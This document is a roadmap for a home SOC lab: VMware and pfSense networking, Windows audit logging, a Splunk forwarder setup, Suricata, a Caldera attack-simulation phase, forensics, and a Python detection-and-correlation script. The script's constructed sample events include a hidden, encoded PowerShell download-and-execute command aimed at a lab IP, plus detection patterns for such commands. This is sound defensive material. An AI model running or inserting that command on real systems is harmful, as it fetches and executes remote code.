Project Implementation Roadmap
📅 Published: 2026-05-21 23:49 | 🔄 Last Updated: 2026-05-21 23:52
Phase 1: Establishing the Foundation (Virtual Infrastructure)
- Objective: Deploy a functional LAN and SIEM segment with network visibility and connectivity between the virtual machines.
- Tasks:
  - Configure VMnet2 (LAN) and VMnet3 (SIEM) in the VMware Virtual Network Editor.
  - Install pfSense with three interfaces (WAN, LAN and SIEM). Establish baseline firewall rules that permit log forwarding from the LAN to the SIEM (at minimum TCP 9997 for the Splunk forwarders) and deny everything else between the two segments, so that a compromised LAN host cannot reach the SIEM beyond the log port; pfSense rules are stateful, so the return traffic needs no separate rule.
  - Install the base operating systems: Windows Server 2022 (DC01) and Windows 10/11 (WS01).
Phase 2: Active Directory Deployment & Logging Hardening
- Objective: Transition from standalone machines to a centrally managed domain environment.
- Tasks:
  - Promote DC01 to a Domain Controller and join WS01 to the domain.
  - Configure Group Policy Objects (GPOs) for enhanced logging: enable Audit Process Creation together with "Include command line in process creation events" (Event ID 4688 with the full command line) and turn on PowerShell Script Block Logging (Event ID 4104). Verify on WS01 with `gpupdate /force` followed by `auditpol /get /subcategory:"Process Creation"`.
  - Deploy Sysmon on both Windows machines with a standardized configuration template (e.g., SwiftOnSecurity's sysmon-config or Olaf Hartong's sysmon-modular).
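The two GPO settings named above are backed by the registry values below. This .reg fragment is an added example, not configuration from the original project; it is useful for confirming on WS01 that the policy actually applied (compare against `reg query`), or for enabling the same logging on a standalone test box. The Audit Process Creation subcategory itself lives in the audit policy rather than the registry, so it is set through the GPO (Advanced Audit Policy Configuration > Detailed Tracking) or with `auditpol /set /subcategory:"Process Creation" /success:enable /failure:enable`.

```reg
Windows Registry Editor Version 5.00

; PowerShell Script Block Logging (Event ID 4104 in the
; Microsoft-Windows-PowerShell/Operational channel). Equivalent GPO:
; Computer Configuration > Administrative Templates > Windows Components >
; Windows PowerShell > Turn on PowerShell Script Block Logging
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging]
"EnableScriptBlockLogging"=dword:00000001

; Include the command line in 4688 process creation events. Equivalent GPO:
; Computer Configuration > Administrative Templates > System >
; Audit Process Creation > Include command line in process creation events
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit]
"ProcessCreationIncludeCmdLine_Enabled"=dword:00000001
```

Import with `reg import <file>` on a machine outside the domain, or leave the GPO as the source of truth and only use the file for comparison. Both settings record whatever was typed, including passwords passed on a command line, so the Security and PowerShell logs now need the same access control as the SIEM that stores them.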
Phase 3: Log Pipeline Configuration (The Heart of the SOC)
- Objective: Ensure Windows telemetry is ingested by Splunk and visible on its dashboards.
- Tasks:
  - Deploy the Splunk server (Splunk running in Docker on an Ubuntu VM). Publish TCP 9997 from the container and enable receiving on that port (Settings > Forwarding and receiving, or `splunk enable listen 9997`); without this the forwarders have nothing to connect to.
  - Install the Splunk Universal Forwarder (UF) on both DC01 and WS01.
  - Configure the forwarder: inputs.conf selects the channels to collect (Security, System, PowerShell/Operational and the Sysmon operational log), and outputs.conf sends them to the Splunk indexer on port 9997. The indexes named in inputs.conf must already exist on the indexer, otherwise the events are dropped.
  - Verify ingestion in Splunk with basic SPL (Search Processing Language) queries, for example a count of events by host and sourcetype.
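As an added example (not the project's own configuration), the forwarder-side files the third task refers to, plus the receiving stanza for the Splunk server. The indexer address 10.0.3.10, the index names `wineventlog` and `sysmon`, and placing the stanzas in an app called `lab_inputs` are assumptions for this lab; create the two indexes on the Splunk server before the forwarders start sending.

```ini
# %SPLUNK_HOME%\etc\apps\lab_inputs\local\inputs.conf  (on DC01 and WS01)
# What to collect. 4624/4698 live in Security, 7045 in System, 4104 in
# PowerShell/Operational. Index names are assumptions and must exist on the indexer.
[WinEventLog://Security]
disabled = 0
index = wineventlog

[WinEventLog://System]
disabled = 0
index = wineventlog

[WinEventLog://Microsoft-Windows-PowerShell/Operational]
disabled = 0
index = wineventlog

[WinEventLog://Microsoft-Windows-Sysmon/Operational]
disabled = 0
index = sysmon
renderXml = true

# %SPLUNK_HOME%\etc\apps\lab_inputs\local\outputs.conf  (on DC01 and WS01)
# Where to send it: the Splunk indexer on the SIEM segment, port 9997 (assumed IP).
[tcpout]
defaultGroup = siem_indexers

[tcpout:siem_indexers]
server = 10.0.3.10:9997

# inputs.conf on the Splunk server (the file equivalent of `splunk enable listen 9997`).
# Receiving must be enabled, or the forwarders queue locally and eventually drop data.
[splunktcp://9997]
disabled = 0
```

`renderXml = true` on the Sysmon stanza is what the Sysmon add-on expects for field extraction. After restarting the forwarder service, `index=sysmon OR index=wineventlog | stats count by host, sourcetype` should show both DC01 and WS01 within a minute; if one host is missing, check the pfSense rule for TCP 9997 before anything else.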
Phase 4: Network Security & IDS (Intrusion Detection System)
- Objective: Monitor and analyze network traffic crossing the network segments.
- Tasks:
  - Install the Suricata package on pfSense and configure it to inspect traffic on the LAN interface. Start in alert-only (legacy) mode; inline blocking mode can silently break the log pipeline if a rule misfires on forwarder traffic.
  - Forward pfSense and Suricata logs to Splunk (via syslog or a dedicated Splunk add-on). Suricata's EVE JSON output (eve.json) is the easiest to search, since every field arrives already parsed.
  - Validation: generate known-bad traffic from WS01 (for example a request to testmynids.org, which triggers the "GPL ATTACK_RESPONSE id check returned root" signature) and verify that the alert is indexed in Splunk.
  - Configure OpenVPN on pfSense so the SOC analyst's machine can reach the lab over an encrypted tunnel.
Phase 5: Attack Execution Phase
- Objective: Execute all 11 steps of the attack playbook and collect the resulting forensic evidence.
- Tasks:
  - Deploy a Command and Control (C2) server (MITRE Caldera) on a Kali Linux instance.
  - Execute the 11-step attack playbook in order: initial phishing delivery -> privilege escalation -> lateral movement -> ransomware deployment. Take VM snapshots of DC01 and WS01 before the ransomware stage so the lab can be restored afterwards.
  - Critical step: after each stage, pause and pivot to Splunk to find the newly generated events. Record the exact time of each action, since that timestamp is what the investigation in the next phase will search around, and capture screenshots of the matching logs as documented forensic evidence.
Phase 6: Analysis & Final Incident Report
- Objective: Translate raw telemetry into a cohesive, presentable forensic investigation.
- Tasks:
  - Conduct the investigation: analyze Windows event logs (e.g., Event IDs 4624 for logons, 7045 for service installation, 4698 for scheduled task creation, 4104 for PowerShell script blocks) together with Sysmon telemetry for threat hunting. Acquire memory (RAM) and disk images of the compromised hosts and analyze them with Volatility 2/3, FTK Imager and the Eric Zimmerman (EZ) Tools suite. Capture memory before powering a machine off: the running process list, network connections and injected code do not survive a reboot.
  - Draft the incident report: map each phase of the attack lifecycle to the MITRE ATT&CK framework and explain the detection methodology based on the acquired logs.
Phase 7: Detection Engineering
- Objective: Develop and implement proactive detection rules that identify future attacks exhibiting similar behavioral patterns. Detection rules do not prevent an attack on their own; they shorten the time between the first malicious event and an analyst noticing it.
- Tasks:
  - Write Sigma rules for each detected technique, so the logic is portable beyond this Splunk instance.
  - Develop advanced SPL detection queries derived from the searches used in Phase 6.
  - Configure correlation rules in the SIEM that chain individual detections on the same host into a single incident, and test every rule by replaying the relevant playbook step.
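To make the Phase 6 hunt and the Phase 7 correlation concrete, the following Python script is an added example, not code from the original project: it runs per-event detections over a handful of constructed Windows/Sysmon events of the kinds listed in Phase 6, tags each hit with a MITRE ATT&CK technique ID, and then correlates the hits per host into one incident the way a SIEM correlation rule would. Field names follow what the Splunk Windows and Sysmon add-ons extract; the hosts, IPs, account name, thresholds and the attack chain are invented for the demo.

```python
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# -enc takes base64 of UTF-16LE text, so build the blob instead of hand-typing it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.2.50/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode()
SYSMON = "XmlWinEventLog:Microsoft-Windows-Sysmon/Operational"

# Constructed sample events (not lab telemetry): five attack stages plus two benign
# events; field names follow the Splunk Windows/Sysmon add-on extractions.
EVENTS = [
    {"_time": "2026-05-21T10:00:05", "host": "WS01", "sourcetype": SYSMON, "EventCode": 1,
     "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"_time": "2026-05-21T10:00:06", "host": "WS01", "EventCode": 4104, "ScriptBlockText": PAYLOAD},
    {"_time": "2026-05-21T10:12:40", "host": "WS01", "EventCode": 4698, "Task_Name": "\\Updater",
     "Task_Content": "<Command>C:\\Users\\alice\\AppData\\Roaming\\upd.exe</Command>"},
    {"_time": "2026-05-21T10:31:02", "host": "DC01", "EventCode": 4624, "Logon_Type": "3",
     "Account_Name": "alice", "Source_Network_Address": "10.0.2.20", "Authentication_Package": "NTLM"},
    {"_time": "2026-05-21T10:31:05", "host": "DC01", "EventCode": 7045, "Service_Name": "PSEXESVC",
     "Service_File_Name": "%SystemRoot%\\PSEXESVC.exe"},
    {"_time": "2026-05-21T09:00:00", "host": "DC01", "EventCode": 4624, "Logon_Type": "3",  # benign
     "Account_Name": "WS01$", "Source_Network_Address": "10.0.2.20", "Authentication_Package": "Kerberos"},
    {"_time": "2026-05-21T09:05:00", "host": "WS01", "EventCode": 7045, "Service_Name": "SplunkForwarder",
     "Service_File_Name": "C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe"},  # benign
]

ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
TRUSTED = ("c:\\windows\\", "c:\\program files")  # binaries here are expected; elsewhere is suspicious


def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand blob (base64 of UTF-16LE), or return None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _hit(ev, rule, technique, detail):
    return {"time": ev["_time"], "host": ev["host"], "rule": rule, "technique": technique, "detail": detail}


def detect(ev):
    """Per-event rules; each branch is what one SPL search would express."""
    hits, code = [], ev["EventCode"]
    if code == 1 and ev.get("sourcetype") == SYSMON:            # Sysmon process creation
        parent = ev.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
        if parent in OFFICE and ev.get("Image", "").lower().endswith("powershell.exe"):
            hits.append(_hit(ev, "office_spawns_powershell", "T1566.001", parent))
        decoded = decode_encoded_command(ev.get("CommandLine", ""))
        if decoded:
            hits.append(_hit(ev, "encoded_powershell", "T1059.001", decoded))
    elif code == 4104:                                           # script block logging
        text = ev.get("ScriptBlockText", "")
        if re.search(r"DownloadString|Invoke-Expression|\bIEX\b|Invoke-Mimikatz", text):
            hits.append(_hit(ev, "suspicious_script_block", "T1059.001", text[:60]))
    elif code == 4698:                                           # scheduled task created
        m = re.search(r"<Command>(.*?)</Command>", ev.get("Task_Content", ""))
        if m and not m.group(1).lower().startswith(TRUSTED):
            hits.append(_hit(ev, "scheduled_task_untrusted_path", "T1053.005", m.group(1)))
    elif code == 7045:                                           # service installed
        path = ev.get("Service_File_Name", "").lower().replace("%systemroot%", "c:\\windows")
        if ev.get("Service_Name", "").upper() == "PSEXESVC":     # PsExec drops into C:\Windows,
            hits.append(_hit(ev, "psexec_service", "T1569.002", path))  # so a path check alone misses it
        elif not path.startswith(TRUSTED):
            hits.append(_hit(ev, "service_untrusted_path", "T1543.003", path))
    elif code == 4624:                                           # network/RDP NTLM logon by a user
        if (ev.get("Logon_Type") in ("3", "10") and ev.get("Authentication_Package") == "NTLM"
                and not ev.get("Account_Name", "").endswith("$")):
            hits.append(_hit(ev, "ntlm_network_logon", "T1021",
                             f"{ev['Account_Name']} from {ev['Source_Network_Address']}"))
    return hits


def correlate(events, window=timedelta(hours=1)):
    """Phase 7 style rule: two or more distinct techniques on one host inside the window is one incident."""
    per_host = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["_time"]):
        for h in detect(ev):
            per_host[h["host"]].append(h)
    incidents = []
    for host, hits in per_host.items():
        for i, first in enumerate(hits):
            t0 = datetime.fromisoformat(first["time"])
            chain = [h for h in hits[i:] if datetime.fromisoformat(h["time"]) - t0 <= window]
            techniques = sorted({h["technique"] for h in chain})
            if len(techniques) >= 2:
                incidents.append({"host": host, "start": first["time"],
                                  "techniques": techniques, "chain": [h["rule"] for h in chain]})
                break  # one incident per host is enough for the report
    return incidents


if __name__ == "__main__":
    for inc in correlate(EVENTS):
        print(inc["host"], inc["start"], " -> ".join(inc["chain"]), inc["techniques"])
```

Two design points carry over to the real SPL rules: the 4624 rule alone is noisy (a single NTLM network logon is routine), which is why it only counts once another technique lands on the same host inside the window; and the 7045 rule keys on the service name as well as the path, because PsExec writes its binary into C:\Windows, where a path-based rule would trust it. Each per-event branch maps one-to-one to a Sigma rule, and `correlate` is the logic a SIEM correlation search expresses with a time window and `stats dc(technique) by host`.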